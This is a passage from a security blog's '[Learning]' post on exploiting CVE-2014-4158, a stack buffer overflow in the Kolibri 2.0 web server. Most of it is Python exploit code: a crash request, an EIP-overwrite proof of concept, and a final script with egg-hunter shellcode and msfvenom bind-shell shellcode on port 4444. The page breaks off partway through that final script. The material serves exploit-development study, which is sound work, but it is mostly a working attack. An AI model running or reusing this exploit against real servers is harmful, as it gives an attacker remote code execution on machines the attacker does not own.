<!DOCTYPE html><html lang="en-us" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>[Learning] CVE-2014-4158: Kolibri Buffer Overflow with Egg Hunter | ISSAC/iss4cf0ng's blog</title><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="[Learning] CVE-2014-4158: Kolibri Buffer Overflow with Egg Hunter | ISSAC/iss4cf0ng's blog"><meta name="twitter:image" content="https://iss4cf0ng.github.io/images/meme/Wallpaper/MyArt/3.png"><meta property="og:title" content="[Learning] CVE-2014-4158: Kolibri Buffer Overflow with Egg Hunter"><meta property="og:image" content="https://iss4cf0ng.github.io/images/meme/Wallpaper/MyArt/3.png"><meta property="og:url" content="https://iss4cf0ng.github.io/2026/09/12/2026-9-12-Kolibri-EggHunter/index.html"><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.6.1/MathJax.js"></script><script>MathJax.Hub.Config({
 menuSettings: {
   zoom: "None"
 },
 showMathMenu: false,
 jax: ["input/TeX","output/CommonHTML"],
 extensions: ["tex2jax.js"],
 TeX: {
   extensions: ["AMSmath.js","AMSsymbols.js"],
   equationNumbers: {
     autoNumber: "AMS"
   }
 },
 tex2jax: {
   inlineMath: [["\\(", "\\)"]],
   displayMath: [["\\[", "\\]"]]
 }
});</script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><script async src="https://www.googletagmanager.com/gtag/js?id=G-RQ7HTMYT8W"></script><script>window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-RQ7HTMYT8W');</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ISSAC/iss4cf0ng's blog" type="application/atom+xml">
</head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/About/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/Alien/"><span class="navItemTitle">Alien</span></a></li><li class="navItem"><a class="navBlock" href="/Arsenal/"><span class="navItemTitle">Arsenal</span></a></li><li class="navItem"><a class="navBlock" href="/2026/01/28/2026-1-28-ToolsDuplexSpy-v2-0-0/"><span class="navItemTitle">DuplexSpy</span></a></li><li class="navItem"><a class="navBlock" href="/Notes/"><span class="navItemTitle">Notes</span></a></li><li class="navItem"><a class="navBlock" href="/Series/"><span class="navItemTitle">Series</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[Learning] CVE-2014-4158: Kolibri Buffer Overflow with Egg Hunter</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2026-09-12T06:52:54.000Z" id="date"> 2026-09-12</time></div></span><br><span>Last Update: <div class="control"><time datetime="2026-09-13T12:26:10.259Z" id="updated"> 2026-09-13</time></div></span><br><span>Word Count: <div class="control">1.9k</div></span><br><span>Read Time: <div class="control">11 min</div></span></div></div><hr><div id="post-content"><h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p>This article is part of my series: <strong><a href="/FromBugToExploit">From Bug To Exploit</a></strong></p>
<p>In this article, I will demonstrate how to exploit Kolibri using an egg hunter and discuss some limitations in practice.</p>
<blockquote>
<p>Note: If you are not familiar with this technique, you may refer to <a href="/2026/09/12/2026-9-12-EggHunter/">this article</a>.</p>
</blockquote>
<p align="center" class='item-img' data-src='/images/meme/mika_rollcake_hit.png'><img src="/images/meme/mika_rollcake_hit.png" width=250/>
</p>

<h1 id="Cause-of-the-Vulnerability"><a href="#Cause-of-the-Vulnerability" class="headerlink" title="Cause of the Vulnerability"></a>Cause of the Vulnerability</h1><p>The server application of Kolibri v2.0 fails to properly check the boundary of the URL pattern when processing an HTTP request.</p>
<p>This leads to a stack-based buffer overflow and ultimately allows arbitrary code execution.</p>
<h1 id="Buffer-Overflow"><a href="#Buffer-Overflow" class="headerlink" title="Buffer Overflow"></a>Buffer Overflow</h1><p>First, let’s input a large amount of data to crash the server:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> argparse<br><span class="hljs-keyword">import</span> struct<br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> time<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> select<br><br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> urlparse<br><br>parser = argparse.ArgumentParser()<br>parser.add_argument(<span class="hljs-string">&#x27;--url&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--dos&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--deadbeef&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--exploit&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>args = parser.parse_args()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_dos</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    parsed = urlparse(url)<br>    host = parsed.hostname<br>    port = parsed.port <span class="hljs-keyword">or</span> <span class="hljs-number">80</span><br><br>    payload_path = <span class="hljs-string">b&#x27;/&#x27;</span> + <span class="hljs-string">b&#x27;\x41&#x27;</span> * <span class="hljs-number">600</span><br><br>    http_request = (<br>        <span class="hljs-string">f&#x27;GET <span class="hljs-subst">&#123;payload_path.decode(<span class="hljs-string">&quot;latin1&quot;</span>)&#125;</span> HTTP/1.1\r\n&#x27;</span><br>        <span class="hljs-string">f&#x27;Host: <span class="hljs-subst">&#123;host&#125;</span>:<span class="hljs-subst">&#123;port&#125;</span>\r\n\r\n&#x27;</span><br>    ).encode(<span class="hljs-string">&#x27;latin1&#x27;</span>)<br><br>    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br><br>    <span class="hljs-keyword">try</span>:<br>        sock.connect((host, port))<br>        sock.sendall(http_request)<br>        resp = sock.recv(<span class="hljs-number">4096</span>)<br>        <span class="hljs-built_in">print</span>(resp.decode(<span class="hljs-string">&#x27;latin1&#x27;</span>, errors=<span class="hljs-string">&#x27;ignore&#x27;</span>))<br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> ex:<br>        <span class="hljs-built_in">print</span>(ex)<br>    <span class="hljs-keyword">finally</span>:<br>        sock.close()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_deadbeef</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_exploit</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> args.url:<br>        parser.print_help()<br>        <span class="hljs-keyword">return</span><br><br>    url = args.url<br><br>    <span class="hljs-keyword">if</span> args.dos:<br>        do_dos(url)<br>    <span class="hljs-keyword">elif</span> args.deadbeef:<br>        do_deadbeef(url)<br>    <span class="hljs-keyword">elif</span> args.exploit:<br>        do_exploit(url)<br>    <span class="hljs-keyword">else</span>:<br>        args.print_help()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    main()<br></code></pre></td></tr></table></figure>
<blockquote>
<p>Note: Here, I strongly recommend using <code>socket</code> to perform the HTTP request instead of <code>urllib</code> since it strictly checks the characters in the URL pattern.</p>
</blockquote>
<p>Then, the server application crashes:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/2.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/2.png" width=600/>
</p>

<p>Next, find the exact offset for overwriting <code>EIP</code> using <code>mona</code>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/3.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/3.png" width=800/>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/4.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/4.png" width=800/>
</p>

<p>We can also use <code>mona</code> to find an instruction containing <code>jmp esp</code>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/5.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/5.png" width=800/>
</p>

<p>I wrote a simple proof-of-concept script to write <code>DEADBEEF</code> into <code>EIP</code>:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> argparse<br><span class="hljs-keyword">import</span> struct<br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> time<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> select<br><br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> urlparse<br><br>parser = argparse.ArgumentParser()<br>parser.add_argument(<span class="hljs-string">&#x27;--url&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--dos&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--deadbeef&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--exploit&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>args = parser.parse_args()<br><br>OFFSET = <span class="hljs-number">515</span><br>RET = struct.pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x7ecd1b4e</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_dos</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_deadbeef</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    parsed = urlparse(url)<br>    host = parsed.hostname<br>    port = parsed.port <span class="hljs-keyword">or</span> <span class="hljs-number">80</span><br><br>    payload_path = <span class="hljs-string">b&#x27;/&#x27;</span> + <span class="hljs-string">b&#x27;\x41&#x27;</span> * OFFSET + DEADBEEF<br><br>    http_request = (<br>        <span class="hljs-string">f&#x27;GET <span class="hljs-subst">&#123;payload_path.decode(<span class="hljs-string">&quot;latin1&quot;</span>)&#125;</span> HTTP/1.1\r\n&#x27;</span><br>        <span class="hljs-string">f&#x27;Host: <span class="hljs-subst">&#123;host&#125;</span>:<span class="hljs-subst">&#123;port&#125;</span>\r\n\r\n&#x27;</span><br>    ).encode(<span class="hljs-string">&#x27;latin1&#x27;</span>)<br><br>    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br><br>    <span class="hljs-keyword">try</span>:<br>        sock.connect((host, port))<br>        sock.sendall(http_request)<br>        resp = sock.recv(<span class="hljs-number">4096</span>)<br>        <span class="hljs-built_in">print</span>(resp.decode(<span class="hljs-string">&#x27;latin1&#x27;</span>, errors=<span class="hljs-string">&#x27;ignore&#x27;</span>))<br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> ex:<br>        <span class="hljs-built_in">print</span>(ex)<br>    <span class="hljs-keyword">finally</span>:<br>        sock.close()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_exploit</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> args.url:<br>        parser.print_help()<br>        <span class="hljs-keyword">return</span><br><br>    url = args.url<br><br>    <span class="hljs-keyword">if</span> args.dos:<br>        do_dos(url)<br>    <span class="hljs-keyword">elif</span> args.deadbeef:<br>        do_deadbeef(url)<br>    <span class="hljs-keyword">elif</span> args.exploit:<br>        do_exploit(url)<br>    <span class="hljs-keyword">else</span>:<br>        args.print_help()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    main()<br></code></pre></td></tr></table></figure>
<p>Here, I strongly recommend using <code>latin1</code> encoding when handling HTTP request/response payloads at the raw socket level because of its <strong>1:1 byte-to-character mapping</strong> (0x00 to 0xff), which allows for <strong>lossless byte transparency</strong>. Unlike UTF-8, <code>latin1</code> does not throw decoding errors when handling arbitrary binary data, making it a safer choice for raw stream manipulation before parsing.</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/6.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/6.png" width=600/>
</p>

<p>Finally, the completed exploit script can be implemented as follows:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> urllib.request<br><span class="hljs-keyword">import</span> argparse<br><span class="hljs-keyword">import</span> struct<br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> time<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> select<br><br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> urlparse<br><br>parser = argparse.ArgumentParser()<br>parser.add_argument(<span class="hljs-string">&#x27;--url&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--dos&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--deadbeef&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--exploit&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>args = parser.parse_args()<br><br>OFFSET = <span class="hljs-number">515</span><br>RET = struct.pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x7ecd1b4e</span>)<br>DEADBEEF = struct.pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0xDEADBEEF</span>)<br>EGG_TAG = <span class="hljs-string">b&quot;\xDE\xAD\xBE\xEF&quot;</span><br><br><span class="hljs-comment"># NtDisplayString</span><br>hunter = <span class="hljs-string">b&quot;&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x66\x81\xca\xff\x0f&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x42&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x52&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x6a\x43&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x58&quot;</span><br>hunter += <span class="hljs-string">b&quot;\xcd\x2e&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x3c\x05&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x5a&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x74\xef&quot;</span><br>hunter += <span class="hljs-string">b&quot;\xb8&quot;</span><br>hunter += <span class="hljs-string">b&quot;\xDE\xAD\xBE\xEF&quot;</span> <span class="hljs-comment"># DEADBEEF</span><br>hunter += <span class="hljs-string">b&quot;\x89\xd7&quot;</span><br>hunter += <span class="hljs-string">b&quot;\xaf&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x75\xea&quot;</span><br>hunter += <span class="hljs-string">b&quot;\xaf&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x75\xe7&quot;</span><br>hunter += <span class="hljs-string">b&quot;\xff\xe7&quot;</span><br><br><span class="hljs-comment"># msfvenom -p windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 -b &quot;\x20\x0a\x0d\x09\x20\x00&quot; -f python -v egg_code</span><br>egg_code =  <span class="hljs-string">b&quot;&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xdb\xcd\xd9\x74\x24\xf4\xb8\x3b\x30\x1f\x9b&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x5b\x2b\xc9\xb1\x53\x31\x43\x17\x83\xc3\x04&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x03\x78\x23\xfd\x6e\x82\xab\x83\x91\x7a\x2c&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xe4\x18\x9f\x1d\x24\x7e\xd4\x0e\x94\xf4\xb8&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xa2\x5f\x58\x28\x30\x2d\x75\x5f\xf1\x98\xa3&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x6e\x02\xb0\x90\xf1\x80\xcb\xc4\xd1\xb9\x03&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x19\x10\xfd\x7e\xd0\x40\x56\xf4\x47\x74\xd3&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x40\x54\xff\xaf\x45\xdc\x1c\x67\x67\xcd\xb3&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xf3\x3e\xcd\x32\xd7\x4a\x44\x2c\x34\x76\x1e&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xc7\x8e\x0c\xa1\x01\xdf\xed\x0e\x6c\xef\x1f&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x4e\xa9\xc8\xff\x25\xc3\x2a\x7d\x3e\x10\x50&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x59\xcb\x82\xf2\x2a\x6b\x6e\x02\xfe\xea\xe5&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x08\x4b\x78\xa1\x0c\x4a\xad\xda\x29\xc7\x50&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x0c\xb8\x93\x76\x88\xe0\x40\x16\x89\x4c\x26&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x27\xc9\x2e\x97\x8d\x82\xc3\xcc\xbf\xc9\x8b&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x21\xf2\xf1\x4b\x2e\x85\x82\x79\xf1\x3d\x0c&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x32\x7a\x98\xcb\x35\x51\x5c\x43\xc8\x5a\x9d&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x4a\x0f\x0e\xcd\xe4\xa6\x2f\x86\xf4\x47\xfa&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x33\xfc\xee\x55\x26\x01\x50\x06\xe6\xa9\x39&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x4c\xe9\x96\x5a\x6f\x23\xbf\xf3\x92\xcc\xae&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x5f\x1a\x2a\xba\x4f\x4a\xe4\x52\xb2\xa9\x3d&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xc5\xcd\x9b\x15\x61\x85\xcd\xa2\x8e\x16\xd8&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x84\x18\x9d\x0f\x11\x39\xa2\x05\x31\x2e\x35&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xd3\xd0\x1d\xa7\xe4\xf8\xf5\x44\x76\x67\x05&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x02\x6b\x30\x52\x43\x5d\x49\x36\x79\xc4\xe3&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x24\x80\x90\xcc\xec\x5f\x61\xd2\xed\x12\xdd&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xf0\xfd\xea\xde\xbc\xa9\xa2\x88\x6a\x07\x05&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x63\xdd\xf1\xdf\xd8\xb7\x95\xa6\x12\x08\xe3&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xa6\x7e\xfe\x0b\x16\xd7\x47\x34\x97\xbf\x4f&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x4d\xc5\x5f\xaf\x84\x4d\x7f\x52\x0c\xb8\xe8&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xcb\xc5\x01\x75\xec\x30\x45\x80\x6f\xb0\x36&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x77\x6f\xb1\x33\x33\x37\x2a\x4e\x2c\xd2\x4c&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xfd\x4d\xf7&quot;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_dos</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_deadbeef</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_connect</span>(<span class="hljs-params">ip: <span class="hljs-built_in">str</span></span>):<br>    shell_sock = <span class="hljs-literal">None</span><br><br>    <span 